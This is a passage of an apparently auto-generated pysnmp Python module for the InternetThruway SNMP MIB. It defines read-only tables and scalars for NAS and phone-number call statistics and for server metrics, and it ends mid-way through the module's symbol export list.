if mibBuilder.loadTexts: remoteBusyInCCSs.setStatus('mandatory')
if mibBuilder.loadTexts: remoteBusyInCCSs.setDescription('Scanned om for tgms that are remoteley blocked.')
nasCallOMTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1), )
if mibBuilder.loadTexts: nasCallOMTable.setStatus('mandatory')
if mibBuilder.loadTexts: nasCallOMTable.setDescription('The NasCallOMTable contains call related OMs on a nas basis')
nasCallOMTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1), ).setIndexNames((0, "InternetThruway-MIB", "nasCallOMIndex"))
if mibBuilder.loadTexts: nasCallOMTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: nasCallOMTableEntry.setDescription('An entry in the NasCallOMTable. Indexed by nasCallOMIndex.')
nasCallOMIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 1), Integer32())
if mibBuilder.loadTexts: nasCallOMIndex.setStatus('mandatory')
if mibBuilder.loadTexts: nasCallOMIndex.setDescription('Identifies a nas Call OM .')
nasName1 = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasName1.setStatus('mandatory')
if mibBuilder.loadTexts: nasName1.setDescription('A unique alphanumeric value to identify this Nas.')
numberOfPorts = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: numberOfPorts.setStatus('mandatory')
if mibBuilder.loadTexts: numberOfPorts.setDescription('Total Number of Ports provisioned against this nas.')
nasOutCallAttempts = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasOutCallAttempts.setStatus('mandatory')
if mibBuilder.loadTexts: nasOutCallAttempts.setDescription('Total number of outgoing call legs attempted.')
nasOutCallNormalCompletions = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasOutCallNormalCompletions.setStatus('mandatory')
if mibBuilder.loadTexts: nasOutCallNormalCompletions.setDescription('Total number of outgoing call legs completed normally.')
nasOutCallAbnormalCompletions = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasOutCallAbnormalCompletions.setStatus('mandatory')
if mibBuilder.loadTexts: nasOutCallAbnormalCompletions.setDescription('Total number of outgoing call legs completed abnormally.')
nasUserBusyOutCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 7), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasUserBusyOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: nasUserBusyOutCallRejects.setDescription('Total Number of outgoing call legs rejected due to user busy signal.')
nasTempFailOutCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 8), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasTempFailOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: nasTempFailOutCallRejects.setDescription('Total Number of outgoing call legs rejected due to temporary failure.')
nasUserUnavailableOutCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 9), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasUserUnavailableOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: nasUserUnavailableOutCallRejects.setDescription('Total number of outgoing call legs failed due to user not available.')
nasAbnormalReleaseOutCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 10), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasAbnormalReleaseOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: nasAbnormalReleaseOutCallRejects.setDescription('Total Number of outgoing call legs rejected due to abnormal release.')
nasOtherOutCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 11), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasOtherOutCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: nasOtherOutCallRejects.setDescription('Total Number of outgoing call legs rejected due to other reasons.')
nasCumulativeActiveOutCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 12), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasCumulativeActiveOutCalls.setStatus('mandatory')
if mibBuilder.loadTexts: nasCumulativeActiveOutCalls.setDescription('Cumulatvie Number of outgoing call legs active so far.')
nasCurrentlyActiveOutCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 13), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasCurrentlyActiveOutCalls.setStatus('mandatory')
if mibBuilder.loadTexts: nasCurrentlyActiveOutCalls.setDescription('Total Number of outgoing call legs currently active.')
nasCurrentlyActiveDigitalOutCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 14), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasCurrentlyActiveDigitalOutCalls.setStatus('mandatory')
if mibBuilder.loadTexts: nasCurrentlyActiveDigitalOutCalls.setDescription('Total Number of outgoing digital call legs currently active.')
nasCurrentlyActiveAnalogOutCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 15), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasCurrentlyActiveAnalogOutCalls.setStatus('mandatory')
if mibBuilder.loadTexts: nasCurrentlyActiveAnalogOutCalls.setDescription('Total Number of outgoing analog call legs currently active.')
nasInCallAttempts = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 16), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasInCallAttempts.setStatus('mandatory')
if mibBuilder.loadTexts: nasInCallAttempts.setDescription('Total number of incoming call legs attempted.')
nasInCallNormalCompletions = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 17), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasInCallNormalCompletions.setStatus('mandatory')
if mibBuilder.loadTexts: nasInCallNormalCompletions.setDescription('Total number of incoming call legs completed normally.')
nasInCallAbnormalCompletions = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 18), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasInCallAbnormalCompletions.setStatus('mandatory')
if mibBuilder.loadTexts: nasInCallAbnormalCompletions.setDescription('Total number of incoming call legs completed abnormally.')
nasUserBusyInCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 19), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasUserBusyInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: nasUserBusyInCallRejects.setDescription('Total Number of incoming call legs rejected due to user busy signal.')
nasTempFailInCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 20), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasTempFailInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: nasTempFailInCallRejects.setDescription('Total Number of incoming call legs rejected due to temporary failure.')
nasUserUnavailableInCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 21), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasUserUnavailableInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: nasUserUnavailableInCallRejects.setDescription('Total number of incoming call legs failed due to user not available.')
nasAbnormalReleaseInCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 22), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasAbnormalReleaseInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: nasAbnormalReleaseInCallRejects.setDescription('Total Number of incoming call legs rejected due to abnormal release.')
nasOtherInCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 23), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasOtherInCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: nasOtherInCallRejects.setDescription('Total Number of incoming call legs rejected due to other reasons.')
nasCumulativeActiveInCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 24), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasCumulativeActiveInCalls.setStatus('mandatory')
if mibBuilder.loadTexts: nasCumulativeActiveInCalls.setDescription('Cumulatvie Number of incoming call legs active so far.')
nasCurrentlyActiveInCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 25), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasCurrentlyActiveInCalls.setStatus('mandatory')
if mibBuilder.loadTexts: nasCurrentlyActiveInCalls.setDescription('Total Number of incoming call legs currently active.')
nasCurrentlyActiveDigitalInCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 26), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasCurrentlyActiveDigitalInCalls.setStatus('mandatory')
if mibBuilder.loadTexts: nasCurrentlyActiveDigitalInCalls.setDescription('Total Number of incoming digital call legs currently active.')
nasCurrentlyActiveAnalogInCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 27), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasCurrentlyActiveAnalogInCalls.setStatus('mandatory')
if mibBuilder.loadTexts: nasCurrentlyActiveAnalogInCalls.setDescription('Total Number of incoming analog call legs currently active.')
nasAllActiveCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 28), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasAllActiveCalls.setStatus('mandatory')
if mibBuilder.loadTexts: nasAllActiveCalls.setDescription('Total number of currently active call legs (all type).')
nasMaxPortsUsed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 29), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasMaxPortsUsed.setStatus('mandatory')
if mibBuilder.loadTexts: nasMaxPortsUsed.setDescription('Maximum number of ports used in this nas since the last system restart.')
nasMinPortsUsed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 30), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasMinPortsUsed.setStatus('mandatory')
if mibBuilder.loadTexts: nasMinPortsUsed.setDescription('Minimum number of ports used in this nas since the last system restart.')
nasCurrentlyInUsePorts = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 7, 1, 1, 31), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nasCurrentlyInUsePorts.setStatus('mandatory')
if mibBuilder.loadTexts: nasCurrentlyInUsePorts.setDescription('Number of ports currently in use.')
phoneCallOMTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1), )
if mibBuilder.loadTexts: phoneCallOMTable.setStatus('mandatory')
if mibBuilder.loadTexts: phoneCallOMTable.setDescription('The PhoneCallOMTable contains call related OMs on a phone number basis')
phoneCallOMTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1), ).setIndexNames((0, "InternetThruway-MIB", "phoneCallOMIndex"))
if mibBuilder.loadTexts: phoneCallOMTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: phoneCallOMTableEntry.setDescription('An entry in the PhoneCallOMTable. Indexed by phoneGroupIndex.')
phoneCallOMIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1, 1), Integer32())
if mibBuilder.loadTexts: phoneCallOMIndex.setStatus('mandatory')
if mibBuilder.loadTexts: phoneCallOMIndex.setDescription('Uniquely identifies an entry in this table.')
phoneNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: phoneNumber.setStatus('mandatory')
if mibBuilder.loadTexts: phoneNumber.setDescription('Phone number for the underlying Call OM record.')
phoneDialCallAttempts = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: phoneDialCallAttempts.setStatus('mandatory')
if mibBuilder.loadTexts: phoneDialCallAttempts.setDescription('Total number of dial calls attempted.')
phoneDialCallNormalCompletions = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: phoneDialCallNormalCompletions.setStatus('mandatory')
if mibBuilder.loadTexts: phoneDialCallNormalCompletions.setDescription('Total number of dial calls completed normally.')
phoneDialCallAbnormalCompletions = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: phoneDialCallAbnormalCompletions.setStatus('mandatory')
if mibBuilder.loadTexts: phoneDialCallAbnormalCompletions.setDescription('Total number of dial calls completed abnormally.')
phoneUserBusyDialCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: phoneUserBusyDialCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: phoneUserBusyDialCallRejects.setDescription('Total Number of dial calls rejected due to user busy signal.')
phoneTempFailDialCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1, 7), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: phoneTempFailDialCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: phoneTempFailDialCallRejects.setDescription('Total Number of dial calls rejected due to temporary failure.')
phoneUserUnavailableDialCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1, 8), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: phoneUserUnavailableDialCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: phoneUserUnavailableDialCallRejects.setDescription('Total number of dial calls failed due to user not available.')
phoneAbnormalReleaseDialCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1, 9), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: phoneAbnormalReleaseDialCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: phoneAbnormalReleaseDialCallRejects.setDescription('Total Number of dial calls rejected due to abnormal release.')
phoneOtherDialCallRejects = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1, 10), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: phoneOtherDialCallRejects.setStatus('mandatory')
if mibBuilder.loadTexts: phoneOtherDialCallRejects.setDescription('Total Number of dial calls rejected due to other reasons.')
phoneCumulativeActiveDialCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1, 11), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: phoneCumulativeActiveDialCalls.setStatus('mandatory')
if mibBuilder.loadTexts: phoneCumulativeActiveDialCalls.setDescription('Cumulatvie Number of dial calls active so far.')
phoneCurrentlyActiveDialCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1, 12), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: phoneCurrentlyActiveDialCalls.setStatus('mandatory')
if mibBuilder.loadTexts: phoneCurrentlyActiveDialCalls.setDescription('Total Number of dial calls currently active.')
phoneCurrentlyActiveDigitalDialCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1, 13), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: phoneCurrentlyActiveDigitalDialCalls.setStatus('mandatory')
if mibBuilder.loadTexts: phoneCurrentlyActiveDigitalDialCalls.setDescription('Total Number of digital dial calls currently active.')
phoneCurrentlyActiveAnalogDialCalls = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 5, 1, 1, 14), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: phoneCurrentlyActiveAnalogDialCalls.setStatus('mandatory')
if mibBuilder.loadTexts: phoneCurrentlyActiveAnalogDialCalls.setDescription('Total Number of analog dial calls currently active.')
csgComplexCLLI = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 1), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: csgComplexCLLI.setStatus('mandatory')
if mibBuilder.loadTexts: csgComplexCLLI.setDescription('A unique identifier of the CSG Complex.')
serverHostName = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: serverHostName.setStatus('mandatory')
if mibBuilder.loadTexts: serverHostName.setDescription('Host Name of this server.')
serverIpAddress = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: serverIpAddress.setStatus('mandatory')
if mibBuilder.loadTexts: serverIpAddress.setDescription('IP address of this server.')
serverCLLI = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: serverCLLI.setStatus('mandatory')
if mibBuilder.loadTexts: serverCLLI.setDescription('A unique identifier of this server (common in the telco world).')
mateServerHostName = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 5), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mateServerHostName.setStatus('mandatory')
if mibBuilder.loadTexts: mateServerHostName.setDescription('Host Name of this server.')
mateServerIpAddress = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 6), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mateServerIpAddress.setStatus('mandatory')
if mibBuilder.loadTexts: mateServerIpAddress.setDescription('IP address of this server.')
serverMemSize = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: serverMemSize.setStatus('mandatory')
if mibBuilder.loadTexts: serverMemSize.setDescription('Memory size in mega bytes of this server.')
provisionedDPCs = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: provisionedDPCs.setStatus('mandatory')
if mibBuilder.loadTexts: provisionedDPCs.setDescription('Number of destination point codes provisioned.')
provisionedCircuits = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 10), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: provisionedCircuits.setStatus('mandatory')
if mibBuilder.loadTexts: provisionedCircuits.setDescription('Number of circuits provisioned.')
inserviceCircuits = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: inserviceCircuits.setStatus('mandatory')
if mibBuilder.loadTexts: inserviceCircuits.setDescription('Number of circuits in service. This number goes up or down at any given time.')
provisionedNASes = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 12), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: provisionedNASes.setStatus('mandatory')
if mibBuilder.loadTexts: provisionedNASes.setDescription('Number of NASes provisioned.')
aliveNASes = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 13), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aliveNASes.setStatus('mandatory')
if mibBuilder.loadTexts: aliveNASes.setDescription('Number of NASes known to be alive. This number goes up or down at any given time.')
inserviceNASes = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 14), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: inserviceNASes.setStatus('mandatory')
if mibBuilder.loadTexts: inserviceNASes.setDescription('Number of NASes in service. This number goes up or down at any given time.')
provsionedCards = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 15), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: provsionedCards.setStatus('mandatory')
if mibBuilder.loadTexts: provsionedCards.setDescription('Number of NAS cards provisioned.')
inserviceCards = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 16), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: inserviceCards.setStatus('mandatory')
if mibBuilder.loadTexts: inserviceCards.setDescription('Number of NAS cards in service. This number goes up or down at any given time.')
provisionedPorts = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 17), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: provisionedPorts.setStatus('mandatory')
if mibBuilder.loadTexts: provisionedPorts.setDescription('Number of ports provisioned.')
inservicePorts = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 18), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: inservicePorts.setStatus('mandatory')
if mibBuilder.loadTexts: inservicePorts.setDescription('Number of ports in service. This number goes up or down at any given time.')
userCPUUsage = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 19), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: userCPUUsage.setStatus('mandatory')
if mibBuilder.loadTexts: userCPUUsage.setDescription('Percentage of CPU used in user domain. Survman computes this value in every 600 seconds. The value stored in the MIB will be the last one computed.')
systemCPUUsage = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 20), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: systemCPUUsage.setStatus('mandatory')
if mibBuilder.loadTexts: systemCPUUsage.setDescription('Percentage of CPU used in system domain in this server. Survman computes this value in every 600 seconds. The value stored in the MIB will be the last one computed.')
totalCPUUsage = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 21), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: totalCPUUsage.setStatus('mandatory')
if mibBuilder.loadTexts: totalCPUUsage.setDescription('Percentage of CPU used in total in this server Survman computes this value in every 600 seconds. The value stored in the MIB will be the last one computed.')
maxCPUUsage = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 22), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: maxCPUUsage.setStatus('mandatory')
if mibBuilder.loadTexts: maxCPUUsage.setDescription('High water measurement. Maximum CPU Usage (%) in this server. Survman computes this value in every 600 seconds. The value stored in the MIB will be the last one computed.')
avgLoad = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 23), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: avgLoad.setStatus('mandatory')
if mibBuilder.loadTexts: avgLoad.setDescription('Average CPU load factor in this server. Survman computes this value in every 600 seconds. The value stored in the MIB will be the last one computed.')
systemCallRate = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 24), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: systemCallRate.setStatus('mandatory')
if mibBuilder.loadTexts: systemCallRate.setDescription('System Call rate (per second) in this Cserver. Survman computes this value in every 600 seconds. The value stored in the MIB will be the one computed the last time.')
contextSwitchRate = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 25), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: contextSwitchRate.setStatus('mandatory')
if mibBuilder.loadTexts: contextSwitchRate.setDescription('Process context switching rate (per second) in this server. Survman computes this value in every 600 seconds. The value stored in the MIB will be the one computed the last time.')
lastUpdateOMFile = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 7, 6, 26), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lastUpdateOMFile.setStatus('mandatory')
if mibBuilder.loadTexts: lastUpdateOMFile.setDescription('Name of the last updated OM file.')
mibBuilder.exportSymbols("InternetThruway-MIB", cplxMateStandbyState=cplxMateStandbyState, icTimeStamp=icTimeStamp, linkAlignLinkSet=linkAlignLinkSet, nasUserUnavailableInCallRejects=nasUserUnavailableInCallRejects, phoneCallOMIndex=phoneCallOMIndex, linkOMs=linkOMs, hgIPAddress=hgIPAddress, ss7MTP2TrunkFailureAlarmTableEntry=ss7MTP2TrunkFailureAlarmTableEntry, componentIndex=componentIndex, lsIPAddress=lsIPAddress, RouteState=RouteState, ncLostServerTrap=ncLostServerTrap, LinksetState=LinksetState, nasCallOMTableEntry=nasCallOMTableEntry, trunkOccupancyPerCCS=trunkOccupancyPerCCS, routeIndex=routeIndex, destCongestPointcode=destCongestPointcode, userBusyOutCallRejects=userBusyOutCallRejects, componentTable=componentTable, routeTable=routeTable, ss7DestinationAccessible=ss7DestinationAccessible, ss7LinkCongestionAlarmTableEntry=ss7LinkCongestionAlarmTableEntry, partitionSpaceTimeStamp=partitionSpaceTimeStamp, lcKey=lcKey, nasCurrentlyActiveDigitalOutCalls=nasCurrentlyActiveDigitalOutCalls, destInaccessPointcode=destInaccessPointcode, trunkUserUnavailableOutCallRejects=trunkUserUnavailableOutCallRejects, LinkAlignmentState=LinkAlignmentState, trunkOtherOutCallRejects=trunkOtherOutCallRejects, ss7ISUPFailureAlarmTableEntry=ss7ISUPFailureAlarmTableEntry, trunkOtherInCallRejects=trunkOtherInCallRejects, lcLinkSet=lcLinkSet, lsKey=lsKey, ss7FEPCongestionWarning=ss7FEPCongestionWarning, ss7BEPCongestionWarning=ss7BEPCongestionWarning, provisionedPorts=provisionedPorts, nasUserUnavailableOutCallRejects=nasUserUnavailableOutCallRejects, phoneDialCallNormalCompletions=phoneDialCallNormalCompletions, ss7DestinationCongestedAlarm=ss7DestinationCongestedAlarm, cplxMateAvailabilityState=cplxMateAvailabilityState, totalCPUUsage=totalCPUUsage, provsionedCards=provsionedCards, compDebugStatus=compDebugStatus, provisionedNASes=provisionedNASes, trafficInCCSs=trafficInCCSs, currentlyActiveInCalls=currentlyActiveInCalls, cplxMateOperationalState=cplxMateOperationalState, nasStatusAlarm=nasStatusAlarm, nasAlarmTableEntry=nasAlarmTableEntry, PartitionSpaceStatus=PartitionSpaceStatus, linksetTableEntry=linksetTableEntry, rSATimerExpiries=rSATimerExpiries, mtp2CardId=mtp2CardId, compStateAlarm=compStateAlarm, mtp2Key=mtp2Key, ss7DestinationInaccessibleAlarmTable=ss7DestinationInaccessibleAlarmTable, nasIPAddress=nasIPAddress, inserviceNASes=inserviceNASes, linkOMTableEntry=linkOMTableEntry, nasUserBusyInCallRejects=nasUserBusyInCallRejects, lcIPAddress=lcIPAddress, hgName=hgName, phoneNumberOMs=phoneNumberOMs, linkNumSIFReceived=linkNumSIFReceived, numberOfPorts=numberOfPorts, lsName=lsName, lfCardId=lfCardId, icIndex=icIndex, provisionedDPCs=provisionedDPCs, lfIPAddress=lfIPAddress, lostServerAlarmTableEntry=lostServerAlarmTableEntry, mateServerIpAddress=mateServerIpAddress, cumulativeActiveOutCalls=cumulativeActiveOutCalls, nasCurrentlyActiveOutCalls=nasCurrentlyActiveOutCalls, nasInCallAbnormalCompletions=nasInCallAbnormalCompletions, lsFailureTimeStamp=lsFailureTimeStamp, alarmStatusInt1=alarmStatusInt1, csgComplexStateTrapClear=csgComplexStateTrapClear, partitionPercentFull=partitionPercentFull, systemCPUUsage=systemCPUUsage, destPointCode=destPointCode, destInaccessIndex=destInaccessIndex, nasTempFailInCallRejects=nasTempFailInCallRejects, destinationTable=destinationTable, destinationTableEntry=destinationTableEntry, trunkGroupCLLI=trunkGroupCLLI, nasName=nasName, TimeString=TimeString, currentlyActiveDigitalInCalls=currentlyActiveDigitalInCalls, linksetTable=linksetTable, cplxLocEthernetName=cplxLocEthernetName, genericWarning=genericWarning, phoneDialCallAttempts=phoneDialCallAttempts, ss7MTP2TrunkFailureAlarm=ss7MTP2TrunkFailureAlarm, compRestartKey=compRestartKey, linkAlignIPAddress=linkAlignIPAddress, nasCurrentlyActiveInCalls=nasCurrentlyActiveInCalls, linkFailures=linkFailures, ss7MTP3CongestionCritical=ss7MTP3CongestionCritical, contextSwitchRate=contextSwitchRate, nasCumulativeActiveOutCalls=nasCumulativeActiveOutCalls, compDebugKey=compDebugKey, rLCTimerExpiries=rLCTimerExpiries, routeId=routeId, userUnavailableInCallRejects=userUnavailableInCallRejects, outCallNormalCompletions=outCallNormalCompletions, linkHostname=linkHostname, nasCallOMTable=nasCallOMTable, compProvStateStatus=compProvStateStatus, phoneOtherDialCallRejects=phoneOtherDialCallRejects, cisRetrievalFailureTrapMajor=cisRetrievalFailureTrapMajor, maintenanceOMs=maintenanceOMs, trunkOutCallAttempts=trunkOutCallAttempts, phoneNumber=phoneNumber, icName=icName, ncSoftwareVersion=ncSoftwareVersion, linkIndex=linkIndex, 